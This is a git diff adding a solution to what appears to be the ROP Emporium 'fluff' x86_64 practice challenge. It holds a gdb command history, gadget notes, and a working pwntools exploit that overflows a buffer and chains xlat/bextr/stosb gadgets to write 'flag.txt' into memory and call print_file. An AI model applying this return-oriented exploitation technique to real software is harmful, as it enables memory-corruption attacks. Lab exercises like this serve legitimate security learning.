new file: x86_64/fluff/exploit.py

new file:   x86_64/fluff/gadgets

x86_64/fluff/.gdb_history

@@ -0,0 +1,239 @@
+quit
+quit
+continue
+nexti
+nexti
+info reg rdi
+stepi
+nexti
+info reg rcx
+nexti
+info reg rbx
+stepi
+info reg rdx
+inro reg rbx
+info reg rbx
+quit
+stepi
+continue
+stepi
+x rbx
+info reg rbx
+quit
+conitnue
+continue
+stepi
+info reg rbx
+info reg rcx
+quit
+continue
+stepi
+info reg rbx
+info reg rdx
+quit
+continue
+stepi
+info reg rbx
+quit
+continue
+stepi
+info reg rbx
+quit
+continue
+stepi
+info reg rbx
+quit
+continue
+stepi
+stepi
+info reg rcx
+stepi
+info reg rbx
+info reg rdx
+quit
+continue
+stepi
+info reg rbx
+stepi
+info reg rbx
+quit
+stepi
+continue
+stepi
+info reg rbx
+stepi
+info reg rbx
+quit
+quit
+continue
+stepi
+info reg rbx
+quit
+stepi
+continue
+stepi
+info reg rbx
+stepi
+info reg rbx
+quit
+continue
+stepi
+info reg rbx
+stepi
+info reg rdx
+quit
+continue
+stepi
+info reg rbx
+quit
+continue
+stepi
+quit
+continue
+stepi
+info reg rbx
+quit
+quit
+continue
+stepi
+stepi
+info reg rbp
+stepi
+info reg rax
+stepi
+info reg rax
+stepi
+info reg rdi
+x/s 0x601be0
+stepi
+x/s 0x601be0
+stepi
+x/s 0x601be0
+stepi
+x/s 0x601be0
+stepi
+x/s 0x601be0
+stepi
+x/s 0x601be0
+q
+continue
+stepi
+x/s 0x601be0
+stepi
+x/s 0x601be0
+stepi
+x/s 0x601be0
+stepi
+quit
+conitnue
+continue
+continue
+stepi
+quit
+x 0x0000000000400000
+x/c 0x0000000000400000
+x/c 0x00000000004003c4
+x/c 0x0000000000400000
+quit
+continue
+stepi
+x/s 0x601be0
+x/c 0x0000000000400251
+stepi
+stepi
+x/s flag.txt
+x/s 0x601be0
+quit
+watch *0x601be0 + 7
+continue
+x/s 0x601be0
+continue
+x/s 0x601be0
+x/s 0x601be1
+x/s 0x601be0
+x/s 0x601be7
+continue
+x/s 0x601be7
+x/s 0x601be0
+continue
+quit
+watch *0x601be4
+continue
+x/s 0x601be0
+continue
+x/s 0x601be0
+continue
+x/s 0x601be0
+stepi
+stepi
+x/s $rdi
+x/s 0x601be0
+quit
+continue
+x/s 0x601be0
+quit
+break *0x00000000004006a3
+continue
+context
+stepi
+x/s $rdi
+stepi
+quit
+break *0x00000000004006a3
+continue
+context
+c/s 0x7ffdf0faba10 - 8
+x/s 0x7ffdf0faba10 - 8
+x/s 0x7ffdf0faba10 - 4
+x/s 0x7ffdf0faba10 - 16
+x/x 0x7ffdf0faba10 - 8
+x/x 0x7ffdf0faba10 
+x/x 0x7ffdf0faba10 = 4
+x/x 0x7ffdf0faba10 - 4
+x/x 0x7ffdf0faba10 + 4
+context
+info reg rdi
+info reg rip
+search 
+search 0x601be0
+search --qword 0x601be0
+search --qword 0x601be0 --writable
+search --qword 0x0000000000400510 --writable
+context
+continue
+stepi
+continue
+stepi
+quit
+break *0x00000000004006a3
+continue
+stepi
+continue
+x/i 0x400639
+x/10i 0x400639
+quit
+break *0x400639
+conitnue
+continue
+x/s 0x601be0
+continue
+x/s 0x601be0
+continue
+x/s 0x601be0
+stepi
+quit
+break *0x400639
+continue
+continue
+x/s 0x601be0
+continue
+x/s 0x601be0
+continue
+x/s 0x601be0
+stepi
+stepi
+x/s 0x601be0
+x/x 0x601be0 + 8
+x/x 0x601be0 + 9
+x/x 0x601be0 + 10
+quit

x86_64/fluff/exploit.py

@@ -0,0 +1,49 @@
+#!/usr/bin/env python3
+from pwn import *
+
+letter_lookups = {
+        'f' : 0x00000000004003c4,
+        'l' : 0x0000000000400239,
+        'a' : 0x00000000004003d6,
+        'g' : 0x00000000004003cf,
+        '.' : 0x0000000000400251,
+        't' : 0x0000000000400192,
+        'x' : 0x0000000000400246}
+
+def write_str(dest, string, payload):
+    payload += p64(0x00000000004006a3)
+    payload += p64(dest)
+    for c in string:
+        payload += p64(0x40062a)
+        payload += p64(0x4000) # if things go wrong, check endian/order
+        payload += p64(letter_lookups[c] - 0x3ef2)
+
+        payload += p64(0x0000000000400610)
+        payload += p64(0)
+
+        payload += p64(0x400628)
+
+        payload += p64(0x400639)
+
+    return(payload)
+        
+
+prog = gdb.debug('./fluff', gdbscript='''
+break *pwnme + 151
+'''
+)
+payload = b''
+for c in range(40):
+    payload += b'a'
+
+payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload)
+payload += p64(0x00000000004006a3)
+payload += p64(0x601be0) # set rdi
+
+payload += p64(0x0000000000400510)
+
+payload += b"\n"
+prog.sendline(payload)
+sleep(1)
+print(str(prog.recv(), 'UTF-8'))
+prog.interactive()

x86_64/fluff/gadgets

@@ -0,0 +1,44 @@
+Memory bytes information
+=======================================================
+0x00000000004003c4 : 'f'
+0x0000000000400239 : 'l'
+0x00000000004003d6 : 'a'
+0x00000000004003cf : 'g'
+0x0000000000400000 : '.'
+0x0000000000400192 : 't'
+0x0000000000400246 : 'x'
+0x0000000000400192 : 't'
+
+0x0000000000400610 : mov eax, 0 ; pop rbp ; ret
+
+400628: d7                    xlat   BYTE PTR ds:[rbx]          #mov al, [rbx + al] requires rbx
+***
+40062a: 5a                    pop    rdx
+40062b: 59                    pop    rcx
+40062c: 48 81 c1 f2 3e 00 00  add    rcx,0x3ef2
+400633: c4 e2 e8 f7 d9        bextr  rbx,rcx,rdx
+
+#rdx is controller.
+rdx bits 0-7: starting bit
+rdx bits 8-15: length
+***
+400639: aa                    stos   BYTE PTR es:[rdi],al       #moves al to rdi, then adds rdi
+                                                                # requires rdi (check), al
+
+
+
+0000000000400510 : print_file@plt
+
+
+0x00000000004006a3 : pop rdi ; ret
+
+
+exploit:
+
+write to memory using al as letter
+  set al to zero
+  set rbx to memory location
+    rcx: (location - 0x3ef2) before bextr
+    rdx: 0x00 0x20 (from position zero, using 32 bits)
+
+